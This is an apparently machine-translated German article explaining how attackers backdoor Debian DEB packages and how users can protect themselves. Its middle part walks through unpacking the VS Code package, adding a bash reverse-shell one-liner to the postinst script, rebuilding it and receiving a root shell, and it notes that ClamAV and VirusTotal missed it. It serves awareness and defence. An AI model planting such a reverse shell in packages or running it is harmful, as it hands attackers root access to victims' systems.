Wussten Sie, dass Angreifer die in einer DEB-Datei verpackten Skripte ändern können, um sich unbefugten Zugriff auf Ihren PC zu verschaffen? So werden DEB-Pakete mit einer Hintertür versehen.
Die zentralen Thesen
- DEB-Pakete können leicht durch eine Hintertür geöffnet werden, sodass Angreifer schädlichen Code in Ihr System einschleusen können, wenn Sie sie mit Root-Berechtigungen installieren.
- Infizierte DEB-Pakete sind schwer zu erkennen, da sie möglicherweise nicht von Antivirensoftware oder Cloud-Lösungen wie VirusTotal gekennzeichnet werden.
- Um sich selbst zu schützen, vermeiden Sie das Herunterladen von DEB-Paketen von zufälligen Websites, sondern bleiben Sie bei offiziellen Download-Sites oder Besuchen Sie von der Community vertrauenswürdige Websites und erwägen Sie die Installation von Sicherheitstools, um Ihr Linux-System vor dem Netzwerk zu schützen Anschläge.
DEB-Dateien sind Softwarepakete, die das primäre Format für den Versand von Software auf Debian-basierten Linux-Distributionen darstellen.
Um DEB-Pakete zu installieren, müssen Sie einen Paketmanager wie dpkg mit Root-Berechtigungen verwenden. Dies machen sich Angreifer zunutze und schleusen Hintertüren in diese Pakete ein. Wenn Sie sie mit dpkg oder einem anderen Paketmanager installieren, wird der Schadcode ebenfalls ausgeführt und gefährdet Ihr System.
Lassen Sie uns genau untersuchen, wie DEB-Pakete durch eine Hintertür geschützt werden und was Sie tun können, um sich zu schützen.
Wie werden DEB-Pakete mit einer Hintertür versehen?
Bevor Sie verstehen, wie DEB-Pakete mit der Hintertür versehen werden, schauen wir uns an, was in einem DEB-Paket enthalten ist. Zur Demonstration lade ich das Microsoft Visual Studio Code DEB-Paket von der offiziellen Microsoft-Website herunter. Dies ist das gleiche Paket, das Sie herunterladen würden, wenn Sie VS Code unter Linux installieren möchten.
Herunterladen:Visual Studio-Code
Nachdem Sie das Zielpaket heruntergeladen haben, ist es an der Zeit, es zu entpacken. Sie können ein DEB-Paket mit entpacken dpkg-deb Befehl mit dem -R Flag gefolgt vom Pfad zum Speichern des Inhalts:
dpkg-deb -R Dadurch sollte der Inhalt des VS-Code-Pakets extrahiert werden.
Wenn Sie in den Ordner wechseln, finden Sie mehrere Verzeichnisse. Unser Interesse gilt jedoch nur dem DEBIAN Verzeichnis. Dieses Verzeichnis enthält Betreuerskripte, die während der Installation mit Root-Rechten ausgeführt werden. Wie Sie vielleicht bereits herausgefunden haben, modifizieren die Angreifer die Skripte in diesem Verzeichnis.
Zur Demonstration werde ich das ändern postinst Skript und fügen Sie eine einfache einzeilige Bash-Reverse-TCP-Shell hinzu. Wie der Name schon sagt, handelt es sich um ein Skript, das ausgeführt wird, nachdem das Paket auf dem System installiert wurde.
Es enthält Befehle, die die Konfigurationen abschließen, z. B. das Einrichten symbolischer Links, die Behandlung von Abhängigkeiten und mehr. Im Internet finden Sie unzählige verschiedene Reverse-Shells. Die meisten von ihnen funktionieren gleich. Hier ist der Beispiel-Reverse-Shell-Einzeiler:
bash -i >& /dev/tcp/127.0.0.1/42069 0>&1Erklärung des Befehls:
- bash: Dies ist der Befehl, der die Bash-Shell aufruft.
- -ich: Das Flag weist Bash an, im interaktiven Modus zu laufen, was Befehls-I/O in Echtzeit ermöglicht.
-
>& /dev/tcp/ip/port: Dies leitet weiter Standardausgabe und Standardfehler an einen Netzwerk-Socket und stellt im Wesentlichen eine TCP-Verbindung zum her
Und . - 0>&1: Dadurch werden Ein- und Ausgabe an denselben Ort umgeleitet, d. h. an den Netzwerk-Socket.
Für Uneingeweihte: Eine Reverse-Shell ist eine Art Code, der, wenn er auf dem Zielcomputer ausgeführt wird, eine Verbindung zurück zum Computer des Angreifers initiiert. Reverse Shells sind eine großartige Möglichkeit, Firewall-Einschränkungen zu umgehen, da der Datenverkehr von der Maschine hinter der Firewall generiert wird.
So sieht das geänderte Skript aus:
Wie Sie sehen, ist alles gleich, aber es wurde nur eine Zeile hinzugefügt, nämlich unsere Bash-Reverse-Shell. Jetzt müssen Sie die Dateien wieder in das Verzeichnis „einbauen“..deb" Format. Nutzen Sie einfach die dpkg Befehl mit dem --bauen markieren oder verwenden dpkg-deb mit dem -B Flag gefolgt vom Pfad des extrahierten Inhalts:
dpkg --build
dpkg-deb -b Jetzt kann das mit der Hintertür versehene DEB-Paket auf bösartigen Websites verbreitet werden. Lassen Sie uns ein Szenario simulieren, in dem ein Opfer das DEB-Paket auf sein System heruntergeladen hat und es wie jedes andere reguläre Paket installiert.
Der obere Terminalbereich ist für den POV des Opfers und der untere für den POV des Angreifers. Das Opfer installiert das Paket mit sudo dpkg -i und der Angreifer wartet geduldig auf eingehende Verbindungen über die Netcat Befehl unter Linux.
Sobald die Installation abgeschlossen ist, bemerken Sie, dass der Angreifer die Reverse-Shell-Verbindung erhält und nun Root-Zugriff auf das System des Opfers hat. Jetzt wissen Sie, wie DEB-Pakete mit einer Hintertür versehen werden. Erfahren Sie nun, wie Sie sich schützen können.
So erkennen Sie, ob ein DEB-Paket bösartig ist
Da Sie nun wissen, dass es infizierte DEB-Pakete gibt, fragen Sie sich bestimmt, wie Sie infizierte Pakete finden können. Für den Anfang können Sie es mit a versuchen Linux-Antivirensoftware wie ClamAV. Als ein ClamAV-Scan für das Paket durchgeführt wurde, wurde es leider nicht als bösartig gekennzeichnet. Hier ist das Ergebnis des Scans:
Wenn Sie also nicht über eine Premium-Antivirenlösung verfügen (was keine Garantie dafür ist, dass Sie nicht gehackt werden), ist es ziemlich schwierig, schädliche DEB-Pakete zu erkennen. Versuchen wir es mit einer Cloud-Lösung wie der VirusTotal-Website:
Wie Sie sehen, hat VirusTotal keinen Fehler festgestellt. Nun, die einzige Möglichkeit, sich vor solchen Bedrohungen zu schützen, besteht darin, grundlegende Sicherheitsmaßnahmen einzuhalten, z. B. niemals Dateien von unbekannten Quellen herunterzuladen Überprüfen des Hash einer Dateiund im Allgemeinen die Installation zwielichtiger Software vermeiden.
Das Internet ist voll von solchen Bedrohungen. Die einzige Möglichkeit, ohne Datenverlust zu surfen, besteht darin, einen kühlen Kopf zu bewahren und vertrauenswürdige Websites zu durchsuchen. Darüber hinaus sollten Sie für Linux auch versuchen herauszufinden, ob die Software, die Sie herunterladen, über eine verfügt AppImage-Variante da sie eigenständig sind und in einer Sandbox untergebracht werden können, sodass sie nicht mit Ihrem System in Berührung kommen.
Laden Sie DEB-Pakete nicht von zufälligen Websites herunter!
DEB-Pakete sind nicht von Natur aus schlecht, Angreifer können sie jedoch leicht als Waffe nutzen und an ahnungslose Benutzer versenden. Wie gezeigt, kann ein DEB-Paket einfach geöffnet und geändert werden, um mit nur wenigen Befehlen benutzerdefinierten Code hinzuzufügen, was es zu einem häufigen Vektor für die Verbreitung von Malware macht.
Selbst einfache Hintertüren in DEB-Paketen werden von den führenden Antivirenlösungen nicht erkannt. Das Beste, was Sie tun können, ist, auf Nummer sicher zu gehen, beim Surfen im Internet Ihren gesunden Menschenverstand beizubehalten und Software immer nur von offiziellen Download-Sites oder von der Community vertrauenswürdigen Sites herunterzuladen.
Da Sie sich nun der Sicherheitsrisiken bewusst sind, die mit der Installation von DEB-Paketen von neuen oder unbekannten Websites einhergehen, sollten Sie bei der Installation neuer Software vorsichtig sein. Allerdings reicht es nicht aus, nur darauf zu achten, was Sie installieren. Auch Ihr Linux-System kann ein Ziel von Netzwerkangriffen sein.
Um sicherzustellen, dass Sie im Falle eines Netzwerkangriffs sicher sind, sollten Sie über die Installation von Netzwerksicherheitstools nachdenken.
